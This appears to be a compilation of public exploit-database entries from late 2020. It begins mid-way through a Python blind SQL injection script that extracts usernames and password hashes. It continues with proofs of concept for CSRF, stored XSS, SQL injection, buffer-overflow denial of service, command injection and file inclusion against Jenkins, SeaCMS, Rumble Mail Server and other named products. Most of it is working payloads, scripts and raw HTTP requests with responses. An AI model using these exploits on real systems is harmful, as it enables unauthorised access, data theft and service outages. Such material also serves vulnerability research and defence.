    Longer values are truncated, which is why the sample output in the
    header shows a 49-character bcrypt hash. A single mis-timed response
    mis-decodes a character and there is no retry.

    Visibility: hundreds of near-identical GETs to graph.php with SQL in
    ``sort`` and latency clustering at ``sleep`` seconds. The first
    ``inj_str`` assignment below contains ``+=`` in the middle of a
    concatenation — a transport artifact of the published copy — and does
    not parse as printed.
    """
    extracted = ""
    max_pos_len = 50
    # Loop through length of string
    # Not very efficient, should use a guessing algorithm
    print("[*] Extracting strings from row " + str(row+1) + "...")
    for pos in range(1,max_pos_len):
        # Test if current pos does have any valid value. If not, break
        direction = ">"
        inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) += ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix
        if not sqli(url,headers,cookies,inj_str,sleep):
            break
        # Loop through ASCII printable characters
        direction = "="
        for guess in range(ascii_begin,ascii_end+1):
            extracted_char = chr(guess)
            inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix
            if sqli(url,headers,cookies,inj_str,sleep):
                extracted += chr(guess)
                print(extracted_char,end='',flush=True)
                break
    return extracted

# Main
def main(argv):
    """Drive the extraction: parse arguments, log in, count rows, dump columns.

    ``argv`` is accepted for signature compatibility but ignored; the four
    positional arguments are read from ``sys.argv`` directly, and a
    non-numeric sleep value raises ValueError before the try block. Exits 0
    on a usage error, -1 on any request failure or when no rows are read.
    """
    if len(sys.argv) != 5:
        print(f"[*] Usage: {sys.argv[0]} <username> <password> <url> <sleep_in_seconds>\n")
        exit(0)
    usern, passw, url = sys.argv[1], sys.argv[2], sys.argv[3]
    sleep = int(sys.argv[4])

    headers = http_headers()

    try:
        token, cookies = get_initial_token_and_cookies(url, headers)

        if check_auth(url, headers):
            valid_cookies = get_valid_cookie(url, headers, token, cookies, usern, passw)
        else:
            valid_cookies = cookies
            print("[+] Authentication not required, continue without authentication...")

        # The vulnerable page, plus what to read from it.
        url = f"{url}/graph.php"
        columns = ['username', 'password']
        table = "users"

        print("[*] Printing number of rows in table...")
        rows = get_rows(url, headers, valid_cookies, table, sleep)
        if not rows:
            print("[!] Unable to retrieve rows, checks requests.\n")
            exit(-1)

        for column in columns:
            print(f"[*] Retrieving {rows} rows of data using '{column}' as column and '{table}' as table...")
            for row in range(rows):
                retrieved = get_data(url, headers, valid_cookies, row, column, table, sleep)
                print(f"\n[*] Retrieved value '{retrieved}' for column'{column}' in row {row + 1}")
        print("\n[+] Done!\n")

    except requests.exceptions.Timeout:
        print("[!] Timeout error\n")
        exit(-1)
    except requests.exceptions.TooManyRedirects:
        print("[!] Too many redirects\n")
        exit(-1)
    except requests.exceptions.ConnectionError:
        print("[!] Not able to connect to URL\n")
        exit(-1)
    except requests.exceptions.RequestException as e:
        print(f"[!] {e}")
        exit(-1)
    except requests.exceptions.HTTPError as e:
        # Never reached: HTTPError is a RequestException and is taken by the
        # clause above. Kept in this order to match the original behaviour.
        print(f"[!] Failed with error code - {e.code}\n")
        exit(-1)
    except KeyboardInterrupt:
        keyboard_interrupt()
        exit(-1)

# If we were called as a program, go execute the main function.
if __name__ == "__main__":
    # main() ignores this argument and re-reads sys.argv itself.
    main(sys.argv[1:])
            
# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)
# Date: 2020-12-14
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: v2.6.1
# Tested on: Kali Linux

POC(localhost/index.php?module=users/change_password):

<html>
   <!-- CSRF PoC  -->
   <!-- Review note: the request carries a form_session_token field with a
        hard-coded value. A token that is unpredictable and bound to the
        victim's session cannot be supplied by a cross-origin page, so such a
        form would be rejected; TODO confirm how v2.6.1 derives this value. -->
   <body>
   <script>history.pushState('', '', '/')</script>
     <form 
action="https://localhost/index.php?module=users/change_password&action=change" 
method="POST">
       <input type="hidden" name="form&#95;session&#95;token" 
value="D&#94;HUyTDh0X" />
       <input type="hidden" name="password&#95;new" value="123456789" />
       <input type="hidden" name="password&#95;confirmation" 
value="123456789" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>


--
            
# Exploit Title: Jenkins 2.235.3 - 'X-Forwarded-For' Stored XSS
# Date: 11/12/2020
# Exploit Author: gx1
# Vendor Homepage: https://www.jenkins.io/
# Software Link:  https://updates.jenkins-ci.org/download/war/
# Version: <= 2.251 and <= LTS 2.235.3
# Tested on: any
# CVE :  CVE-2020-2231

# References: 
https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955
https://www.openwall.com/lists/oss-security/2020/08/12/4

Vendor Description: 

Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the remote address of the host starting a build via 'Trigger builds remotely'.
This results in a stored cross-site scripting (XSS) vulnerability exploitable by users with Job/Configure permission or knowledge of the Authentication Token.
Jenkins 2.252, LTS 2.235.4 escapes the remote address of the host.

Technical Details and Exploitation: 

When a build of a project completes, Jenkins records a message for the completed build; this message is shown in the build history view. 
The message reflects the username, for example "Started by user gx1". 
However, when the 'Trigger builds remotely' feature is enabled, the remote client IP is shown instead of the username, i.e.: 
Started by remote host '<client-ip-address>'.
To understand how remote build trigger works, have a look at this post: https://narenchejara.medium.com/trigger-jenkins-job-remotely-using-jenkins-api-20973618a493
The message "Started by remote host '<client-ip-address>'" is not escaped. This could seem to have no security impact because the user cannot change the remote IP, right? This is not completely true: when the application server is behind a proxy, the "remote client IP" is not available, as the request comes from the proxy. 
In these cases, X-Headers are used to let the application server learn the real client information. A common one is X-Forwarded-For: this HTTP header is inserted by load balancers into the data stream to identify the address of the connecting client system.  

To exploit the vulnerability the attacker requires several conditions: 
- Remote build should be enabled and if needed the attackers should have obtained API authentication token or should have Job/Configure permission
- Application server that hosts Jenkins should use some X-Header to override client IP. This happens often, because usually the application server is under proxy, and in order to obtain client IP, override mechanisms are used.
For example, in Apache Tomcat it is possible to configure X-Forwarded-For header processing, as described in https://dacurry-tns.github.io/deploying-apereo-cas/setup_tomcat_configure-xforwardedfor-header-processing.html. 

Proof Of Concept:  

1. Identify the X-Header that the application server uses to recover the client IP behind the proxy. Let's suppose that "X-Forwarded-For" is used. In this case, the attacker can inject malicious payloads in the "X-Forwarded-For" header value to exploit the vulnerability; 
2. Send the following request:     

GET /job/<project_name>/build?token=<token> HTTP/1.1
Host: <jenkins_host>:8080
X-Forwarded-For: gx1<script>alert(1);</script>
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=88DD2A6297E0E0FE9A59B310CA271715; screenResolution=1220x686
Connection: close

HTTP/1.1 201 
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Content-Type-Options: nosniff
Location: http://<vulnenv>:8080/jenkins/queue/item/7/
Content-Length: 0
Date: Fri, 11 Dec 2020 17:04:06 GMT
Connection: close

<project_name> is the project that can be remotely built by using <token>. 

3. To trigger the XSS, navigate to the build item in the build history once the build has finished. For example, if the build that just finished is #16, the stored XSS is present in 
http://<jenkins_host>/job/<project_name>/16/

Solution: 

The following releases contain fixes for security vulnerabilities:
* Jenkins 2.252
* Jenkins LTS 2.235.4
            
# Exploit Title: Courier Management System 1.0 - 'ref_no' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application

Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch
Step 4. Fill the form  , click on save
Step 5. Capture the request to the "/ajax.php?action=save_branch" page in Burp Suite
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs "
Step 7. This will inject successfully and you will have an information disclosure of all database contents

---
Parameter: ref_no (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ref_no=123' AND (SELECT 5575 FROM (SELECT(SLEEP(5)))ngIo) AND
'knst'='knst
---
            
# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
# Date: 13.12.2020
# Exploit Author: securityforeveryone.com
# Author Mail: hello[AT]securityforeveryone.com
# Vendor Homepage: https://sourceforge.net/projects/miniweb/
# Software Link: https://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
# Version: 0.8.19
# Tested on: Win7 x86
# Researchers: Security For Everyone Team - https://securityforeveryone.com

'''
Description

 MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the
 first parameter in a POST request.

Exploitation

 The vulnerability lies in the name of the first parameter of the POST request. Example: PARAM_NAME1=param_data1&param_name2=param_data2
 If we send a lot of "A" characters as "PARAM_NAME1", the MiniWeb server will crash.

About Security For Everyone Team

We are a team that has been working on cyber security in the industry for a long time. 
In 2020, we created securityforeveryone.com where everyone can test their website security and get help to fix their vulnerabilities.
We have many free tools that you can use here: https://securityforeveryone.com/free-tool-list

'''

#!/usr/bin/python

import socket
import sys
import struct

# Python 2 script: `print` is used as a statement below and a str (not
# bytes) is handed to socket.send(), so it does not run unchanged on
# Python 3. `struct` is imported above but unused in the visible code.
if len(sys.argv) != 2 :
	print "[+] Usage : python exploit.py [VICTIM_IP]"
	exit(0)

# Target address from argv; port 8000 is fixed (presumably the MiniWeb
# listener the author tested against -- not configurable here).
TCP_IP = sys.argv[1]
TCP_PORT = 8000

# Oversized name for the first form parameter. Per the description above,
# a long first-parameter name is what crashes the daemon (denial of
# service); the trailing "#4085" looks like another length the author tried.
xx = "A"*2038 #4085

# Minimal POST whose form-encoded body starts with the long parameter name.
# NOTE(review): the Host header is a hard-coded lab address rather than
# TCP_IP; per the description the crash keys on the parameter name, not on
# this header, but it will not match a real target's host name.
http_req = "POST /index.html HTTP/1.1\r\n"
http_req += "Host: 192.168.231.140\r\n"
http_req += "From: header-data\r\n"
http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
http_req += xx + "=param_data1&param_name2=param_data2"

# One-shot connection: send the request and close without reading a reply
# (the expected outcome is a daemon crash, not a response). The socket is
# not closed if connect() or send() raises.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
print "[+] Sending exploit payload..."
s.send(http_req)
s.close()
            
# Exploit Title: Seacms 11.1 - 'ip and weburl' Remote Command Execution
# Date: 20201212
# Exploit Author: j5s
# Vendor Homepage: https://www.seacms.net/
# Software Link: https://www.seacms.net/
# Version: 11.1

POST /SeaCMS111/5f9js3/admin_ip.php?action=set HTTP/1.1
Host: 192.168.137.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://192.168.137.139
Connection: close
Referer: http://192.168.137.139/SeaCMS111/5f9js3/admin_ip.php
Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
t00ls=e54285de394c4207cd521213cebab040;
t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
Upgrade-Insecure-Requests: 1

v=0&ip=+%22%3Bphpinfo%28%29%3B%2F%2F

Vulnerable parameter: ip

payload:";phpinfo();//
            
# Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
# Date: 2020-10-14
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://systemexplorer.net/
# Software Link:  http://systemexplorer.net/download/SystemExplorerSetup.exe
# Version: Version 7.0.0
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Service info:

C:\Users\m507>sc qc SystemExplorerHelpService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SystemExplorerHelpService
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : System Explorer Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>


# Exploit:
Because the service binary path contains spaces and is not quoted, this vulnerability could permit executing code during startup or reboot with escalated privileges.
            
# Exploit Title: Seacms 11.1 - 'checkuser' Stored XSS
# Date: 20201212
# Exploit Author: j5s
# Vendor Homepage: https://www.seacms.net/
# Software Link: https://www.seacms.net/
# Version: 11.1

POST /SEACMS111/5f9js3/admin_safe.php?action=setting HTTP/1.1
Host: 192.168.137.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://192.168.137.139
Connection: close
Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=setting
Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
t00ls=e54285de394c4207cd521213cebab040;
t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MDoiIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
Upgrade-Insecure-Requests: 1

checkuser=%22%3E%3CsCrIpT%3Ealert%281%29%3C%2FsCrIpT%3E&checkhta=on&btnsetting=%E6%8F%90%E4%BA%A4

Vulnerable parameter: checkuser

payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
            
# Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
# Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/=")
# Date: 2020-12-12
# Exploit Author: Wadeek
# Vendor Homepage: https://www.boldgrid.com/
# Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip
# Version: 1.14.9
# Tested on: BackBox Linux

1) The 'readme.txt' file reveals the plugin version:
-> GET /wp-content/plugins/boldgrid-backup/readme.txt
Stable tag: 1.14.9

2) The 'env-info.php' file reveals the following information without authentication:
-> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php
{
    [...],
    "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x=
86_64",
    "php_version":"7.X.X",
    "server_addr":"127.0.0.1",
    "server_name":"www.example.com",
    "server_protocol":"HTTP/1.1",
    "server_software":"Apache/2.X.XX (Ubuntu)",
    "uid":XX,
    "username":"www-data"
}

3) The 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication:
-> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json
{
    [...]
    "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
    [...]
}
--trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--
            
# Exploit Title: Seacms 11.1 - 'file' Local File Inclusion
# Date: 20201212
# Exploit Author: j5s
# Vendor Homepage: https://www.seacms.net/
# Software Link: https://www.seacms.net/
# Version: 11.1

GET /SEACMS111/5f9js3/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1
Host: 192.168.137.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=scan
Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
t00ls=e54285de394c4207cd521213cebab040;
t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
Upgrade-Insecure-Requests: 1

Vulnerable parameter: file

payload:C:/windows/system.ini
            
# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Exploit:
POST /users HTTP/1.1
Host: 127.0.0.1:2580
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
Origin: http://127.0.0.1:2580
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://127.0.0.1:2580/users
Upgrade-Insecure-Requests: 1

username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico " />
<title>RumbleLua</title>
<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div class="header_top">
  <div class="header_stuff">
    RumbleLua on a.com<br />
    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
    </span>

<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>

<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>

</div>
</div>
<div id="contents">


<h1>RumbleLua users </h1>
<p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
while regular users can only
see and edit the domains they have access to.
</p>
<table class="elements">
  <tr>
    <th>Create a new user:</th>
  </tr>
<tr>
<td>
<form action="/users" method="post" name="makeuser">

  <div style="width: 300px; text-align:right; float: left;">
    <label for="username"><strong>Username:</strong></label>
    <input name="username" autocomplete="off" type="text" id="username" >
    <br>
    <label for="password"><strong>Password:</strong></label>
    <input type="password" autocomplete="off" name="password" id="password">
    <br />
    <label for="password"><strong>Access rights:</strong></label>
    <select name="rights" size="4" style="width: 150px;" multiple="multiple">
    <option value="*" style="color:#C33; font-weight:bold;">Full control</option>
    <optgroup label="Domains:">
        </optgroup>
    </select>
      </div>
    <p><br /><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

      &nbsp;&nbsp;
      <input type="submit" name="submit" id="submit" value="Submit" />
    </p>

</form>
</td>
</tr>
</table>
<table width="200" class="elements">
  <tr>
    <th>Username</th>
    <th>Rights</th>
    <th>Actions</th>
  </tr>
  <tr>
    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td>
    <td>Full control</td>
    <td>
	<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
	<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
	</td>
  </tr>
    <tr>
    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td>
    <td>Full control</td>
    <td>
	<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
	<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
	</td>
  </tr>
    <tr>
    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>
    <td>Full control</td>
    <td>
	<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
	<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
	</td>
  </tr>
  </table>
<p>&nbsp;</p>


</div>
<br />
<p align="center">
Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
</p>
</body>


</html>
            
# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Exploit:
POST /settings:save HTTP/1.1
Host: 127.0.0.1:2580
Connection: keep-alive
Content-Length: 343
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:2580
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:2580/settings
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings
HTTP/1.1 302 Moved
Location: /settings:save

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico " />
<title>RumbleLua</title>
<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div class="header_top">
  <div class="header_stuff">
    RumbleLua on <script>alert(xss.com)</script><br />
    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
    </span>

<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>

<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>

</div>
</div>
<div id="contents">
  <h1>Server settings</h1>

Saving config/rumble.conf
</div>
<br />
<p align="center">
Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
</p>
</body>


</html>
            
# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Info
The parameters `domain` and `path` are vulnerable to stored XSS.

# Exploit:
POST /domains HTTP/1.1
Host: 127.0.0.1:2580
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Origin: http://127.0.0.1:2580
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert(
Upgrade-Insecure-Requests: 1

domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico " />
<title>RumbleLua</title>
<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div class="header_top">
  <div class="header_stuff">
    RumbleLua on a<br />
    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
    </span>

<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>

<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>

</div>
</div>
<div id="contents">
  <h2>Domains</h2>
<p>
  <table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td>			<form action="/domains" method="post" id='create'>
			<div>
			<div >
				<div class='form_key'>
					Domain name:
				</div>
				<div class='form_value'>
					<input type="text" name="domain"/>
				</div>
			</div>

			<div>
				<div class='form_key'>
					Optional alt. storage path:
				</div>
				<div class='form_value'>
					<input type="text" name="path"/>
				</div>
			</div>


			<div class='form_el' id='domainsave' >
				<div class='form_key'>
						<input type="hidden" name="create" value="true"/>
					<input class="button" type="submit" value="Save domain"/>
					<input class="button"  type="reset" value="Reset"/>
				</div>
			</div>
			<br/><br/><br/><br/><br />
			</div>
			</form>
			</td></tr></table></p>
<p>&nbsp;</p>
<table class="elements" border='0' cellpadding='5' cellspacing='1'>
  <tr><th>Domain</th><th>Actions</th></tr>
<tr><td><img src='/icons/house.png' align='absmiddle'/>&nbsp;<a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a>  <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table>
</div>
<br />
<p align="center">
